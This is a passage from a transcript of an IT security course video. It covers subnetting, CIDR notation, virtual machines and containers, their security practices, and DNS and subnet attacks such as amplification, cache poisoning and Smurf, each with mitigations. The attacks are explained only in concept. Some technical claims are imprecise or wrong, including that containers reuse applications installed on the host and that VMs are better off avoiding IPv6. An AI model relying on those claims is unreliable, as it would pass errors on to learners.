1, and then eventually router 3, and then it will be passed on to segment 3.
Similarly, if any of these have to pass on the traffic to the other segment, they will
take the appropriate path.
Now if the traffic originating from segment 4 has to be meant for another system
within segment 4 itself, that means the traffic never goes to the router 4. It will be
passed on within the segment itself. Now let's look at some of the advantages of
subnetting. So first of all, smaller segments bring better network management,
which means rather than managing hundreds of systems on a large network, if you
have smaller segments, then you can manage them more efficiently.
Just to give you an example, assume that there is a Finance Department and there is
a Accounts Department. Now you have to apply some sort of security on these two
departments. Rather than putting them into one large network, you can create
different segments for them. And you can limit their traffic so that everybody
doesn't have access to their segments. So this means you are able to better control
the traffic rather than having everything under one single network.
And you're also able to contain security threats within the subnets, which means if
one subnet is attacked by a hacker, you can limit the attack by disallowing the
traffic to go out to the other subnets. That means security threat is now contained
within that particular subnet. So not much of damage is done.
Then with the help of subnetting, you are also able to set up logical divisions within
a network. You can, for instance, if one particular subnet requires only ten system,
you can only assign ten IP addresses and create that subnet. Then another subnet
requires 100 systems, you can create that kind of system. So there is a logical
divisioning that you can create. Not everything needs to be on a single network.
Smaller the segment or the subnet, better the traffic control is. So therefore, logical
divisioning is always good when you divide the network into smaller subnets.
We just discussed how segments or the subnets limit the broadcast of the packets
and, therefore, if there is a less number of broadcast packets floating on the
network, you get to have better network performance. So therefore, segments will
contain the broadcast of the packets within themselves, within their own subnets or
the segments. And now if there are only limited number of system, there is less
broadcast that is happening. So therefore, there is a better network throughput or
better network performance that you get.
Obviously, the network congestion is reduced because every subnet is not throwing
out the packets to other subnets. The broadcast packets are retained within
themselves. So therefore, there is less of network congestion over the other subnets
from one particular subnet. Similarly, other subnets are not able to send the
broadcast messages to the other subnets.
So every subnet will retain the traffic within themselves and, therefore, the overall
network congestion is highly reduced. [Video description begins] The following
information is displayed on screen: Reduces network congestion by restricting
traffic within the network. [Video description ends]
Let's now look at some of the disadvantages. So there were some advantages in
terms of better network performance, better logical divisioning. Now we are going
to look at some of the disadvantages. So first disadvantage is that it will require
more hardware in terms of putting more routers in place. [Video description
begins] The following information is displayed on screen: Requires more hardware
and increases cost. [Video description ends]
So every segment, in order to interact with the other segment or send out the traffic
outside themselves, they will need to have a router in place. [Video description
begins] The following information is displayed on screen: Addition of routers and
switches. [Video description ends] So which means that more hardware is going to
be required.
Now when you talk about creating subnets, you need to have lot of experience and
skills to create subnets. Because there are lot of mathematical calculations that you
will have to do in order to come out with the exact number of subnets that you
need, the IPs per subnet, so you need to have lot of expertise in creating subnets.
Now if you ask a newcomer or a new administrator to sit down and design the
number of subnets that you need, then probably it's going to be a impossible task
for this person to do. So you need to have lot of mathematical calculations done,
and then you can come up with number of subnets and the IPs per subnets that you
need.
The CIDR Notation
[Video description begins] Topic title: The CIDR Notation. Your host for this
session is Ashish Chugh. [Video description ends]
Earlier we looked at subnetting, its advantages and disadvantages. Now we're going
to look at CIDR notation. CIDR stands for classless inter-domain routing, or CIDR.
Subnetting has been in practice for many, many years since the inception of
Internet. Subnetting came into practice or even before that.
Now CIDR is meant to replace addressing architecture of classful network design
on the Internet. Subnetting follows the classful network architecture. Therefore, it
ends up wasting a lot of IP addresses when you divide a network into multiple
subnets. [Video description begins] According to the slide, CIDR notation is an
alternative to subnetting. [Video description ends]
Not all the IP addresses are being utilized. Therefore, when you bring in CIDR
notation, you have a better control over addressing continuous blocks of IP
addresses, which means that you can allocate only the required number of IP
addresses rather than allocating the complete set of IP addresses to a particular
small segment which will need to have only limited number of IP addresses.
But because you allocate the entire range of IP address, that means except for
handful of IP addresses that are being used, every other IP address that is left over
is a waste. [Video description begins] According to the slide, CIDR notation allows
control over addressing continuous blocks of IP addresses. [Video description
ends]
So therefore, because there is a better control on the IP address division and the
allocation, it helps to improve the efficiency of the IP address distribution, which
means you allocate what is required to be allocated. You do not allocate more than
the required IP addresses. That is one of the key benefit of using CIDR notation.
So if you look at the table that is being shown, so there are three classes of IP
addresses. You have Class A, Class B, and Class C. Then you have the IP address
ranges, so 1 to 126, 128 to 191, and 192 to 223. Now there is a default netmask that
is assigned to each one of them. With the CIDR notation, you create something
called slash and a number. So for 255.0.0.0, the CIDR notation comes out to /8.
Similarly, if you go to class B, the CIDR notation comes out to be /16. Similarly, if
you go to class C, the CIDR notation comes out to be /24, which is equivalent to
255.255.255.0. [Video description begins] According to the slide, the default
netmask for class B is 255.255.0.0. [Video description ends]
Let's now look at the CIDR notation and its binary representation along with dotted
decimal representation. So when you talk about class A, the first octet, which
comprises of eight numbers, has ones all the way. Then the dotted decimal is which
is the subnet mask is 255.0.0.0, and CIDR notation here is /8.
When you talk about class B, then first two octets have ones and the last two octets
have zeros. And the dotted decimal representation is 255.255.0.0 and CIDR
notation is 16. Then you come to the class C. Then the first three octets will have
ones and the last octet will have zeros. And dotted decimal representation is
255.255.255.0 and CIDR notation is /24.
Now when you talk about all ones in an octet, then it converts to 255, which is 255.
Similarly, when you move down to class B, then the first two octets have ones and
the last two octets have zeros. So the first two octets will have 255 and 255.
Similarly in class C, if you notice the first three octets have ones, which means the
dotted decimal will have 255, 255, 255 in the first three octets and the zero in the
last one. And the CIDR notation for that is /24.
Tips and Tricks in Subnetting
[Video description begins] Topic title: Tips and Tricks in Subnetting. Your host for
this session is Ashish Chugh. [Video description ends]
Let's now look at the subnetting cheat sheet. Subnetting, as we discussed earlier,
could be a very difficult task. Therefore, there is a cheat sheet that you can use to
come up with the number of systems that you need. So for instance, if you look at
an IP address which is 192.168.100.1 and the CIDR notation for it is /24, now you
don't have to do any kind of calculation.
You can simply look at what /24 means and what would be the subnet mask. So
here the subnet mask would be 255.255.255.0, which will provide total of 256 IP
addresses. And now the total usable IP addresses you will get is 254. This is
because you will have to drop out the first and the last IP address and you will get
only 254 usable IP addresses.
Similarly, if you look at an IP block which is 192.168.100.0 and CIDR notation for
it is /22, now this will give you total of 1,024 IP addresses out of which 1,022 IP
addresses will be usable. Now you can simply divide 1,024 IP addresses by 256
and you will get total of 4 subnets in this case.
Moving on, carrying on the example, now if you look at /22 and you know that
there were 1,024 hosts, then if you divide 1,024 by 256, you would get 4 subnets.
So this becomes pretty easy and handy cheat sheet for you to calculate. So we not
only calculated the number of IP addresses we will get, we also were able to narrow
down with a particular CIDR notation how many subnet and how many hosts we
are able to get.
So if you take another example of CIDR notation of /16, now you would get 65,536
hosts which can be divided across 256 subnets. So smaller the number, which is the
CIDR notation number, more number of hosts you will get, more number of
subnets you will able to create.
Now higher the number, which for example if you take /28, you will have only 16
hosts per subnet and you can create only 16 subnets. So that gives you...Because
there is a 16 number, so that gives you the subnet mask of 255.255.255.240.
VMs and Containers
[Video description begins] Topic title: VMs and Containers. [Video description
ends]
Let's now look at virtual machines, or VMs, and containers. We will also look at
their comparison and how they differ with each other. So first, let's look at virtual
machines. Virtual machine is not a physical system. It's just an emulation of a
physical system, which means a virtual machine can run all of that except that it
does not have any physical hardware. That is the reason it is known as emulation of
a system.
Now depending on the capacity of the physical host, a single physical host can run
multiple virtual machines, which means that you could have as many as 10, 20, 30,
40 virtual machines running on a single physical host. But the number of virtual
machines would depend on the physical capacity or physical resources of the
physical host.
When you are running multiple virtual machines on a single host, that means the
hardware resources, which are CPU, memory, storage, are being shared across
multiple virtual machines. Now single virtual machine can utilize two CPUs and 20
gigabyte of space and 2 GB of or 2 gigabyte of memory. Another virtual machine
can use the same set of resources. Therefore, now the physical host has, let's say, 20
gigabyte of memory and 1 terabyte of hard disk space. Now all these resources are
being shared across multiple virtual machines.
A virtual machine directly does not interact with the hardware of the physical
system. There is something called hypervisor that sits in between the hardware of
the physical host and the virtual machine. Now this hypervisor takes the request
from the virtual machine and passes on to the hardware of the physical system and
ensure that it gets the required resources that it demands or is configured with.
On the other hand, if you look at containers, containers use only a single operating
system. So for instance, if you are running containers within Windows operating
system or a Linux operating system, containers can run only single operating
system within themselves. You cannot have multiple operating system like virtual
machines be running within containers. It sits on top of the physical host and its
operating system, whereas virtual machines are virtually multiple systems running
on a single host.
Containers are embedded within the operating system or the physical host. It shares
the operating system kernel, libraries, and binaries of the operating systems, which
means the container itself does not have any kind of OS kernel or binaries or
libraries but it borrows, basically shares all of these from the system where it is
residing.
One of the key benefit of using container is that it can use the same set of
applications that are hosted on the operating system. Now if you have a physical
host, it is running several applications. Within the container, you need not deploy
these applications. It can use the same set of applications from the host system.
Now let's look at the pictorial representation of virtual machines and containers.
Now when you look at virtual machines, there is the physical infrastructure which
is the physical host having different set of resources like CPU, memory, and
storage space. There is a hypervisor that sits on top of the physical host. So there
are hypervisors which are known as bare metal hypervisors, which do not require
any kind of operating system to run. They themselves carry their own operating
system. So they are installed on a bare metal system with their operating system.
Now once the hypervisor along with its operating system is applied on a bare metal
system, then you can create multiple virtual machines which are carrying the guest
operating system. Now each guest operating system has its own applications. It has
its own binaries and libraries.
Now in the pictorial representation, if you see, there are three different guest
operating systems that are running, which are basically three different virtual
machines. Each virtual machine is carrying its own guest operating system, binaries
and libraries, and applications. On the other hand, if you look at container, there is
the physical hardware which is the host system. Then there is an operating system
applied, which could be Windows or Linux or it could be a third-party container
application like Docker.
Then you have something called container manager, which is used for managing
the containers running within the operating system. Now each one of these
containers is using the same set of binaries and applications from the operating
system, which is applied on the host.
Let's now look at the comparison between the virtual machines and the containers.
So when you talk about the footprint, virtual machines are heavy, which means
they demand lot of resources. Because they are emulation of the actual system, they
also need certain amount of resources to run.
Now if you talk about, let's say, Windows 10 on a physical host, Windows 10 in a
virtual machine, just because Windows 10 is installed in a virtual machine, it does
not mean that it will require less amount of memory or less amount of storage
space. The resource requirements will still remain the same. Therefore, the
footprint of a virtual machine is typically very heavy.
Now when you talk about container, their footprint is pretty light. This is because
they are using the host operating system and its libraries and binaries. Therefore,
they are pretty light in footprint. When you talk about performance of the virtual
machines, it is limited. It depends on the amount of resources allocated to them.
Therefore, it cannot be sure that virtual machines will give you the best
performance possible.
Now when you talk about the containers, their performance depends on the
operating system on which they are configured. When we talk about the operating
system, like we've discussed earlier, each virtual machine can run its own operating
system. So on a single physical host, you can have a virtual machine running Linux
and Windows.
On a single physical host, you can have multiple virtual machines running and each
virtual machine can run its own operating system. For instance, if you talk about
virtual machine 1, it can run Linux, virtual machine 2 can run Unix, and virtual
machine 3 can run Windows 10, virtual machine can run Windows 8.1.
Now if you talk about containers, containers are deployed on the host operating
system. Therefore, they do not have the flexibility of running multiple operating
systems. [Video description begins] According to the slide, containers share the
host OS. [Video description ends]
When you talk about the virtualization type, virtual machines are dependent on the
hardware virtualization, which means that they have to consume the hardware
resources available on the physical host. However, containers, because they are
dependent on the operating system, their virtualization type is considered to be OS
level.
When you talk about the startup time of virtual machines, it could be in several
minutes. It depends on the amount of resources allocated and the number of
applications installed within the virtual machine. For example, if there are multiple
applications installed in a single virtual machine and each application is set to start
up at the boot time, then obviously the virtual machine is going to have a slower
startup time than a virtual machine which does not have any application.
Containers on the other hand, because they are embedded within the operating
system, they have a few milliseconds startup time. As far as memory is concerned,
virtual machine has to take the memory from the physical host. Now if physical
host has limited memory, then obviously the virtual machine will only get a portion
of it. When you talk about containers, they use less memory space because they are
much light in weight. Therefore, they do not require too much memory to run.
As far as virtual machines are concerned, the security level can be set to high,
which means a virtual machine can run in full isolation. Even though it is hosted on
a physical host, it does not require to interact with the physical host. You can
completely isolate that particular virtual machine, or you can even configure it to
only interact with the physical host. Or you can configure a virtual machine to
interact with another set of virtual machines but not with the physical host. It
depends on the configuration. But yes, you can do full isolation of the virtual
machine if required.
When you talk about container, because they are embedded within the operating
system, that is how you have to implement them. So there is only a limited level of
security that can be applied. It is only the process level isolation that can be
possible with the containers.
Now let's look at some of the examples of different applications or different
software that are available for virtual machines and containers. So when you talk
about the products for virtual machines, you have VMware vSphere, which is more
like a management application that can connect multiple ESXi servers. Now ESXi
servers are the ones which will actually run the virtual machines. Using vSphere,
you can connect multiple ESXi servers in the management console and manage all
of these ESXi servers running virtual machines under one umbrella.
Then you have the Xen product, which is also meant for virtualization. Then you
have Hyper-V, which is from Microsoft. Hyper-V is partially embedded within the
Windows Server, and it also available as a standalone product. When you talk
about containers, there is a full-fledged application which is known as Docker,
which is meant to run containers. Then containers can also be run within Windows
Server.
Deployment Considerations for VMs and Containers
[Video description begins] Topic title: Deployment Considerations for VMs and
Containers. Your host for this session is Ashish Chugh. [Video description ends]
Just like the physical system deployment, the containers also have deployment
considerations or basically the best practices or the guidelines that one must follow.
The first one is that you should plan the deployment with lot of caution. Containers
have to be implemented within a system.
So therefore, before you even proceed with the deployment, you need to do careful
planning. What kind of image you are using? What kind of security you're going to
implement? What will run within the containers? You have to plan this kind of
deployment before you actually go ahead and deploy the containers.
You also need to use monitoring tools that can help you collect data. So for
instance, some of the data that you can collect is the resource utilization of the
containers within a system. Then you would also need to ensure that you use only
verified base images. You should download base images from legitimate sources or
the websites on the Internet.
Secondly, you can also create your own base images. However, you have to ensure
that they are hardened before they are implemented within the containers. You
should also perform security audits on the continuous deployment process. This
means that none of the containers should be implemented without security audits.
And there should be continuous audits happening on the containers to ensure that
they are working as expected.
Moving ahead, you should also ensure that containers use proper encryption
methods. So for instance, you would not want to use an encryption method that has
been known for being vulnerable. Therefore, you want to use the best encryption
that is possible and implement it within the containers so that they are hardened and
secure.
Now what happens if there is a vulnerability within the container that has been
detected? In that case, you should not attempt to fix the vulnerability. Simply, you
should destroy the container. And then if there is an updated version that is
available for the base image, you should implement and create the container.
And lastly, lot of people tend to perform system calls when they are debugging the
code within the container. You should avoid that. Remember, too many system
calls can actually endanger the base operating system that is being used. So
therefore, when you are debugging the codes within the containers, you should
limit the number of system calls.
Best Practices for Deploying VMs
[Video description begins] Topic title: Best Practices for Deploying VMs. Your
host for this session is Ashish Chugh. [Video description ends]
Let's now look at some of the best practices for deploying virtual machines. Now
there are various best practices that you would come across if you search the
Internet. What we have narrowed down is few of the key best practices that you can
use when you are deploying virtual machines.
The first one is the host and the virtual machine operating system should always be
updated. [Video description begins] The following information is displayed on
screen: Keep the host and virtual machine operating system and application up-todate. [Video description ends] This is a standard practice that you ought to follow
because virtual machines are just the simulations of a physical machine.
Now if there are vulnerabilities within the virtual machines, they can be exploited
very easily, just like a hacker can exploit vulnerabilities of an operating system
running on a physical machine. Remember, virtual machine is just a replica of a
physical machine except that it does not use any physical hardware. Rest, it
functions exactly like the physical machine.
Therefore, if physical machines can be exploited because of vulnerabilities, so can
the virtual machine. So therefore, you need to ensure that the host, which is running
the virtual machines, and the virtual machines themselves both are up-to-date with
the latest updates and security patches.
Now when you are deploying a virtual machine, which means if you are creating a
virtual machine and you are going to put them into production, you need to ensure
that you do not overcommit the virtual servers, which means you only limit the
virtual servers that are available for deployment of the virtual machines. Every
virtual machines would require a certain amount of memory to run. Just like a
physical machine which requires physical memory to run, virtual machines require
virtual memory to run.
Now that virtual memory cannot be more than the memory of the physical host
where the virtual machine is running. Therefore, you need to ensure that if a virtual
machine, including the operating system and the applications, requires 4 GB of
memory, that you allocate that. However, you have to ensure that the physical host
has more than 4 GB of memory to accommodate this type of request from the
virtual machine.
Then it is advisable that when you are using a virtual machine, you do not use IPv6
IP address allocation. You should only use IPv4. One of the biggest reason is
because most of the networks are still running with IPv4 configuration. Therefore,
avoid mixing configuration of IPv4 and IPv6. Next point to consider is that you
should use either the pass-through or fixed virtual disks attached to SCSI
controllers. Each virtual machine would require some sort of storage.
Now when you configure, let's say, 50 gigabyte of hard drive, which is virtual for a
virtual machine, where does it need to be stored? So you can configure it as a passthrough or fixed virtual disk that are attached to SCSI controllers. SCSI controllers
will give you a better throughput than any other kind of disk controllers.
Then you have to ensure that you do not overprovision the host resources. Now
what are the host resources? You are talking about CPU, memory, and the physical
disk. You should not overprovision them. Now a host might be running one, it
might be running ten virtual machines, depending on the capacity the host has.
So for instance, if host has 16 gigabyte of memory, let's say you would resolve 4
gigabyte for the host itself. Now you have 12 gigabyte that is available. Within 10
virtual machines, you can overprovision 12 gigabyte to 24 gigabyte, meaning that
you can allocate at least, like, 2 to 4 GB or 2 to 4 gigabyte for each virtual machine.
But remember, if you start all virtual machines at one go, it will not work. Some of
the virtual machines will, because they are overprovisioned, they would simply
throw an error that there are no resources available or there is no virtual memory
available for them to start. So therefore, it is necessary that you only do limited
provision of the host resources.
Let's move on to some more best practices for deploying virtual machines. Now
there would be some applications which can only be deployed on a physical hosts.
So you will have to verify if an application can be deployed on a virtual machine.
Now this depends. There are several applications which cannot be deployed on
virtual machines. There could be a possibility that you would have multiple virtual
machines running across multiple hosts. You would have to see if they can be
consolidated onto a single host or more than one host.
Then comes the application consolidation part. You could also do application
consolidation over virtual machines, which means instead of running one
application per host, you could have one application per virtual machine, which
means if there were ten physical hosts that were running ten different applications,
you could have one host with lot of system resources that can run ten virtual
machines and each virtual machine can run one application. Now with this practice,
you have actually freed up nine physical hosts which can be utilized for various
purposes.
Now all virtual machines may not work as you expect them to be. This is because
you have not tested their workloads properly. So before you put the virtual machine
into production, you have to ensure that you test out its workload, which means that
we have to ensure that the applications running within the virtual machines get
enough memory, CPU, and the disk output.
Now if there is a more workload than the virtual machine can tolerate, then
obviously the application access is going to be slow. So you have to test that kind
of workload before the virtual machine is actually put into the production. There
are different methods using which you can deploy the virtual machines. So one is
the manual method, which means you can create a virtual machine manually and
you can deploy it.
Second is, you can automate the virtual machine deployment method. So it could
be using a script to create multiple virtual machines at once or it could be a method
of using a template-based virtual machine and create more virtual machines out of
it.
Let's talk about a scenario in which your organization has created a virtual machine
which is of Windows 10, which is designed for a specific purpose. Now you need
to create ten similar virtual machines that have the same exact configuration as this
virtual machine. So what do you do in that case? In the manual method, you would
sit down and create ten virtual machines, do all the settings in a manual method.
Now if you automate this, you can convert this virtual machine, the first one, as a
template and then can generate ten more virtual machines out of this template. This
can happen in few minutes, whereas if you use the manual method, it might take
you many hours or maybe couple of days before you can get ten machines up and
running.
Now virtual machines also have a integration component which allows the user to
interact with the virtual machines in a much better way. So for instance, VMwarebased virtual machines have a integration component called VMware Tools. It
gives you lot of benefits. One of the benefit is that it allows you to move the cursor
in and out of the virtual machine without pressing any key. Therefore, it is good if
you install the integration components within the virtual machines.
Best Practices for VM and Container Security
[Video description begins] Topic title: Best Practices for VM and Container
Security. Your host for this session is Ashish Chugh. [Video description ends]
Now we'll look at some of the best practices that you can implement for virtual
machine, or VM, security. First of all, you should remove any kind of unnecessary
virtual hardware from the virtual machine. Lot of people, when they create a virtual
machine, they tend to add multiple network adapters, they tend to add USB devices
in the virtual machine. However, in reality, most of these are never used or used
rarely. So lot of virtual hardware is attached to the virtual machine, which can be
exploited.
So one of the best mitigation method to stop the exploitation of unnecessary virtual
hardware is remove them. For example, if your virtual machine requires one virtual
Ethernet adapter, then you should have only one. You should not have two or three
or four. Similarly, if virtual USB adapter is not required, then you should remove
that.
Next best practice is to enable logging for the VM, which is the virtual machine.
Now this logging can be implemented on the server that is hosting the virtual
machine. Similarly, logging should be enabled within the virtual machine as well.
The reason is any action being performed within the virtual machine, you want to
track.
Similarly, when you configure logging on the server that is hosting the virtual
machine, you will be able to track the activities that virtual machine has performed.
So for instance, what time the virtual machine started, what time the virtual
machine was shut down. So these kinds of activities, you'll be able to track.
And this can be specifically useful when you know a virtual machine was supposed
to be in a shutdown state but it was used in a malicious activity by a hacker. Then
you can go back to the logs on the virtual server or the server hosting the virtual
machine and figure out whether this virtual machine was ever started or not.
Then you should also avoid using privileged accounts, one, to power up the virtual
machine, second, within the virtual machine. Now for powering up the virtual
machine, you do not need admin or the root access depending on the type of virtual
server you are using. So for instance, it could be ESXi server or Hyper-V. You do
not need to assign administrative privileges to the users who are going to invoke
virtual machines. You can simply give them user-level permissions to allow them
to invoke the virtual machines.
And similarly, within the virtual machines, you should also give them normal user
access unless or until there is a requirement for them to have administrative access.
This is the same thumb rule that applies to the physical systems, same thumb rule
will apply within the virtual machines as well. You should also configure the
timeout sessions for virtual machines.
Now let's assume a scenario in which a user only used the virtual machine for half
an hour. After that, user did not shut that down and virtual machine was left
unattended. In that scenario, if you had configured timed out, the virtual machine
will get timed out and it will lock itself up. The user now, if he comes back, will
have to unlock the virtual machine.
Just like the physical systems which require patching, the virtual machines also
require patching and updates on regular basis. Remember, virtual machines are just
the simulated systems that are running on a physical host. They are virtually
replicating the physical system. It could be with a different operating system or
with different applications. But they are simulations of the real systems. Therefore,
they also need to be patched and updated regularly.
For example, if a virtual machine is running Windows 10 and there are critical
updates that are rolled out by Microsoft, then not only you have to update the
physical systems but you have to also update the virtual machines with Windows
10.
Along with updating the virtual machines, you need to also update the hosts that are
running the virtual machines. Remember they are the physical systems. They might
be running any type of operating system. Depending on the type of product you are
using to host virtual machines, they would also require patching and updates on
regular basis as and when they are rolled out.
Similar to the user accounts in the physical environment, which could be Active
Directory or any other kind of directory services, you should also have password
policies implemented within the virtual machines.
They could be different scenarios how you are running these virtual machines. A
virtual machine could be running in a completely isolated environment, which
means there is only one virtual machine that is running. It could be a different
virtual network comprising of multiple virtual machines running, or a virtual
machine could also be part of the Active Directory. This is the same Active
Directory which has the other physical systems as its members.
Now because the physical systems have Windows running and there are password
policies that are imposed through Active Directory, if a virtual machine is part of
the domain, it will also have the password policies rolled out. Now the password
lockout policy, to be precise, locks out a account if a password has been incorrectly
entered for a x number of times.
So for example, if the password policy is configured to allow you only three
attempts in entering the password and if the third attempt is also incorrect, then
your account gets locked out for a certain period of time, which could be just like
30 minutes.
The next best practice that we should talk about is shutting down the unused virtual
machines. Lot of hosts that run virtual machines will have virtual machines that are
not being utilized but they are still in running conditions. What we have to know is
that these unused virtual machines can be a danger. If they are exploited, they can
be used in various types of attacks such as denial-of-service attack. So therefore, it
is wise to shut them down if they are not being used.
Next, when you have traffic flowing between two virtual machines or more than
two virtual machines, typically, this type of traffic is in clear text, which means it
can be intercepted using a packet analyzer or a packet sniffer like Wireshark. So
therefore, it is best to encrypt the traffic using a security protocol such as IPSec.
Now to further discuss the best practices for virtual machine security is virtual
firewall, which should be enabled on the virtual machines to ensure that they are
secure. So for instance, it could be Windows firewall that is running on each virtual
machine which is restricting the traffic, either coming in traffic or outgoing traffic,
and ensuring the virtual machine is not receiving any traffic that is malicious.
So let's now look at the best practices for container security. As a standard thumb
rule, you should not run container as root. This applies to the physical systems also.
In lot of security policies, it is one of the first point that is mentioned that users
should not be given root or administrative access to the systems. This is because the
moment you have the root or the administrative access, you can virtually do
anything with the system.
Now to restrict that, that user is not able to tamper with the security or the settings
of the system, you should give them only a normal user access. Same rule applies
to the containers. Secondly, when you are running containers, you need to
download images. Now these images should be downloaded only from the
legitimate repository or sources. You should not download container images from
any unknown website or any unknown source because that image can contain
malware. Now once malware gets into the system, then it can do lot of damage.
You should also enable auditing and ensure that you are able to detect and manage
changes that are happening to the images, which means if you have downloaded an
image, you need to ensure that if there is any change that is being made to it, you
are able to detect that. Because most of these images from the legitimate sources
are well designed and they are meant for a specific purpose. Now if there are
unknown and undetectable changes that are happening to the images, that can
tamper with the security of the image.
Another best practice that we can follow for container security is we should use a
sandbox container, something like gVisor. This means we can run untrusted and
trusted workloads together on the same host. Now what happens is you don't need a
sandbox container for the trusted workload. You need sandbox container for
untrusted workload, which means if there is anything that goes wrong because of
the untrusted workload, it is contained within the sandbox.
Therefore, you can use a sandbox container like gVisor to segregate your untrusted
workload within a contained environment on the same host. You should also ensure
that the system that you are using to run containers, its kernel is hardened, which
means if there is anything unnecessary running within the kernel, any service that is
running based on this kernel, it is stopped and kernel is hardened to an extent that it
is designed to meet a specific purpose.
Similarly, the host configuration should also be hardened. It should not have open
ports that are unnecessary, it should not run unnecessary services. You should also
uses the isolation and least privilege practices. Least privilege practices means we
can go back to the point where I mentioned that the user should not be given root or
admin accesses on the system. This means the users, if they can run a container
with user privileges, a normal user privileges, then they do not need root or admin
access.
And the container must be run in isolation, which means that they need not
interfere with the other applications that might be running on the system. Then you
should also use a method to centrally manage access controls. Now if there are
multiple systems that you have, there are multiple containers that you are running,
it will become difficult for you to not only manage them but also monitor different
types of access controls on these containers. So therefore, you have to use a method
in which you can centrally manage the access controls.
Types of DNS Attacks and their Mitigations
[Video description begins] Topic title: Types of DNS Attacks and their
Mitigations. [Video description ends]
We will now look at different types of DNS attacks and their mitigation methods.
There are many different types of attacks that can happen on a DNS server. The
very first one you should know about is DNS amplification. This is type of
Distributed Denial of Service attack, or DDoS attack.
In this type of attack, the attacker sends small volume of packets using spoofed
source address to the DNS, which means in this type of attack, the attacker sends
small volume of packets that carry a spoofed source address, which means DNS
server thinks the packets are coming from an IP address which is legitimate.
In reality it is not. It is a spoofed source address, which could be anything that the
attacker chooses. And the traffic is sent to the DNS server, which in turn generates
high volume of packets and then sends to the target system. Now what happens is
because the number of packets are being generated from the DNS server and sent to
the target system, eventually the target system is unable to take the load and goes
down.
How do you mitigate this type of attack? One, you need to put a method in place
that can block the spoofed source packets. There are lot of firewalls that have this
capability of blocking the spoofed source packets. You need to also ensure that the
DNS servers are always updated with the latest patches and updates.
You need to also ensure that you only use the DNS servers that you know, which
means the legitimate DNS servers. So anybody can set up a DNS server. However,
that DNS server can only cause damage if your DNS server, which is the legitimate
DNS server, is going to replicate its data with the unknown DNS server.
So you have to ensure that your DNS server does not replicate zone data to
unknown DNS server. It should be replicating zone data only to the specific DNS
servers that it knows. [Video description begins] The following information is
displayed on screen: Use legitimate DNS servers and block the unnecessary
ones. [Video description ends]
Then you have to also ensure that you block open recursive relay servers. There are
lot of relay servers that you can find. You have to ensure that you are not
interacting with these kind of relay servers which can cause recursive replies. Next
type of attack is DNS cache poisoning. In this type of attack, the attacker modifies
the DNS cache, which means if the DNS cache is modified, which means the DNS
server will end up sending the traffic to a wrong destination.
So for example, if the DNS cache carries 1.1.1.1 as the IP address for
microsoft.com, now if the attacker modifies the cache and redirects the traffic for
1.1.1 to another website, which is let's say linux.com. So when you type in
microsoft.com, the traffic will be routed to linux.com. How do you mitigate this
threat? You use TLS protocol, which will ensure the traffic is encrypted. And you
do not want your DNS to be an open DNS. So what you do is you implement and
utilize secure DNS, which will ensure the DNS cache does not get modified.
Next type of attack is unauthorized zone transfers. In this type of attack, because
your legitimate DNS server is configured to replicate zone to any DNS server, this
type of attack can occur. [Video description begins] According to the slide, an
unauthorized zone transfer performs unauthorized zone transfers from a legitimate
DNS server. [Video description ends]
So now what you have to do to mitigate this attack is you have to restrict the zone
transfer only to the DNS servers that you know. So basically instead of replicating
the DNS server to any DNS server, you replicate the zone information only to the
known DNS servers. So for example, if your organization has only three DNS
servers, from the first DNS server, you should replicate the zone information only
to the remaining two.
Now if somebody sets up a DNS server and your DNS server is configured to
replicate to any DNS server, then you have a problem. Because your DNS server is
going to end up replicating zone data to the fourth DNS server that it finds. And of
course, one of the methods that you should follow is you should enable logging and
auditing on the DNS server. Any kind of suspicion that you have in the DNS or its
method of replication to the other DNS servers, that can be tracked using auditing
on the DNS server.
Then you have another type of DNS attack which is called DNS pharming. In this
type of attacking, attacker simply redirects a website traffic to another malicious
website. So for instance, if you type www.microsoft.com, instead of going to
microsoft.com your traffic is routed to another malicious website.
Now how does this happen? Because either the attacker has modified your system's
Hosts file or he has modified the DNS configuration. Now when you send out a
request to a DNS server to access microsoft.com or any other website, the first
thing that is checked is the Hosts file on your system. If there is no IP address
mapping to the domain name, then the request is sent to the DNS server.
What if this type of configuration is modified in the Hosts file on your system? The
request will actually never go to the DNS server in that case. Your system will
simply read the Hosts file and then redirect the request to a malicious website.
How do you mitigate this attack? So you have to ensure the Hosts file on your
system and every other system on the network is marked as read-only, which
means it cannot be modified on the fly; you need to have administrative privileges
to modify that particular file. Then you have to ensure that you monitor the DNS
configuration. You should not simply configure the DNS server and just leave it
like that. You should not only monitor it, you should also be visiting the logs,
ensure everything is working as it should be.
Then the next type of attack you have is DNS hijacking. In this type of attack,
attacker modifies the target's TCP/IP configuration and redirects the traffic to a
malicious website. So assume that the attack is happening on your system. In this
type of attack, attacker will modify the TCP/IP configuration and change the DNS
settings on your system and redirect the traffic to a malicious website.
Now how does the traffic get redirected to a malicious website? Because the DNS
configuration that has been changed has that particular IP address and domain
mapping. How do you mitigate this? You have to ensure that you deploy DNS
security, which is known as DNSSEC.
Types of Subnetting Attacks and Mitigations
[Video description begins] Topic title: Types of Subnetting Attacks and Mitigations.
Your host for this session is Ashish Chugh. [Video description ends]
Let's now look at the types of subnetting attacks and their mitigations. There are
essentially two types of attacks that can happen on a subnet. First one is called the
Smurf attack in which the attacker sends large number of ICMP requests to every
system on the network. [Video description begins] The following information is
displayed on screen: Sends large number of ICMP echo requests to every system on
a network. [Video description ends]
When you are talking about ICMP requests, these are the ping requests that are
being sent to every system on the network. And these ICMP requests carry a
spoofed IP address in the header, which means when the target replies to each one
of those ping requests or the ICMP requests, the responses are being sent to a
spoofed IP address which actually does not exist. Now this is what the Smurf attack
is.
How do you mitigate this Smurf attack? You have to create your network and
divide it into smaller networks, which means you divide it into smaller subnets. So
now lesser the systems in a particular subnet, better control you have over them and
less affected they are by the Smurf attack. Because if you have a large network
which is a flat network and if there is a Smurf attack, every single system will go
down or every single system will attempt to respond to the ICMP requests.
Now if you have a smaller subnet, only one subnet is the target. Therefore, lesser
number of systems are affected. You can also configure the network firewall or the
firewall on each of the system not to respond to the ICMP requests, which means
that if ping request comes or there is a ICMP request being sent to a particular
system, the firewall should block that request, which means the attacker who is
sending that request will get a negative reply. You should also configure the
network ingress filtering. So whatever is coming in, you need to filter that out.
And the next type of attack is the local spoofing. In this type of attack, the victim
and the attacker both exist on the same subnet. What attacker does is sniffs the
traffic that is being sent by the victim. Now how do you block this type of attack?
And it sometimes can be difficult to do that because both the attacker and the
victim exist on the same subnet.
One of the method that you can use is by using the security protocol for sending the
information, which could, if you are sending a traffic on the local network, you can
use IPSec, and if you are sending traffic over the Internet or sending traffic to a
web application, you can encrypt the traffic, which could be done by using
